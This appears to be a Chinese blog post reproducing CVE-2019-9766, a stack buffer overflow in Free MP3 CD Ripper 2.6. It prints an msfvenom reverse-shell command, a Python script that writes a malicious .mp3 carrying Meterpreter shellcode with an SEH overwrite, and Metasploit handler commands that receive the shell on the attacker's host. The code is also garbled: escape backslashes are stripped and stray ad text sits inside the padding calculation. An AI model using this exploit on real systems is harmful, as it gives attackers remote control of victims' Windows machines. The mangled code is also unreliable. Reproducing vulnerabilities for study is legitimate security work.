CVE-2019-9766漏洞复现


这篇文章给大家介绍CVE-2019-9766漏洞复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。 CVE-2019-9766曝出了关于Free MP3 CDRipper的缓冲区溢出漏洞,在转换文件时,Free MP3 CD Ripper 2.6中基于堆栈的缓冲区溢出漏洞,可使远程攻击者通过诱导用户打开特制的.mp3文件执行任意代码。经测试该漏洞影响多个windows版本,包括Windows7及Windows10(需指定Free MP3 CD Ripper 2.6版本)。下文将使用metasploit对CVE-2019-9766进行漏洞复现。环境准备攻击机:Kali(建议网卡设置改为桥接模式) IP 192.168.50.113靶机:Windows10 IP 192.168.50.232首先,靶机需要安装存在漏洞的Free MP3CD Ripper 2.6,版本为重点。安装好后如下图:生成与监听打开kali下的metasploit,生成shellcode: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.50.113lport=2333 -f c –smallest我们利用此shellcode去编写一个脚本,用于生成攻击payload。需要注意的是,应该使用python2版本。buffer= “A” * 4116NSEH= “xebx06x90x90″SEH= “x84x20xe4x66″nops= “x90” * 5buf= “”buf+= “xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30″buf+= “x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff”buf+= “xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52″buf+= “x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1″buf+= “x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b”buf+= “x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03″buf+= “x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b”buf+= “x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24″buf+= “x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb”buf+= “x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c”buf+= “x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54″buf+= “x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x32x71″buf+= “x68x02x00x09x1dx89xe6x50x50x50x50x40x50x40x50″buf+= “x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5″buf+= “x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67″buf+= “x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff”buf+= “xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00″buf+= “x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56″buf+= “x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58″buf+= “x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5″buf+= “x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85″buf+= “x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1″buf+= “xc3xbbxf0xb5xa2x56x6ax00x53xffxd5”;pad= “B” * (免费云主机域名316 – len(nops) – len(buf) )payload= buffer + NSEH + SEH + nops + buf +padtry:f=open(“TestFMCR.mp3″,”w”) print “[+] Creating %s bytes mp3File…” %len(payload) f.write(payload) f.close() print “[+] mp3 File createdsuccessfully!”except: print “File cannot be created!”将生成的MP3文件先放至靶机,然后在攻击机中打开msf,设置攻击模块与监听(ip,端口等)msfconsoleuseexploit/multi/handlerset lhost 192.168.50.113set lport 2333set payload windows/meterpreter/reverse_tcp然后开始监听:exploit结果 设置好监听后,我们将准备好的MP3文件放入靶机运行。点击convert,选择文件,如果此处没有看到mp3文件的话,可能是他默认只显示.wav文件,下面改为全部文件即可。选择好后直接选打开,程序开始读取转换文件。运行后可能会闪退、未响应或是报错,毕竟这不是mp3文件。没有关系,我们可以看到监听那边已经有响应了。 不得不说CVE-2019-9766漏洞利用价值比较低,虽然是缓冲区溢出造成的远程代码执行,但利用前提是目标机安装了Free MP3 CD Ripper,且必须为2.6版本。所有,这个漏洞也非常好修复:删除这个软件,或将其更新为更高的版本。关于CVE-2019-9766漏洞复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

相关推荐: JSONP劫持的发现过程是怎样的

JSONP劫持的发现过程是怎样的,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。记录一次JSONP劫持的发现过程和一些思考,和大家一起分享,一起进步通过爬取页面获取到可疑的urlllback 看到了…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/05 16:14
Next 02/05 16:14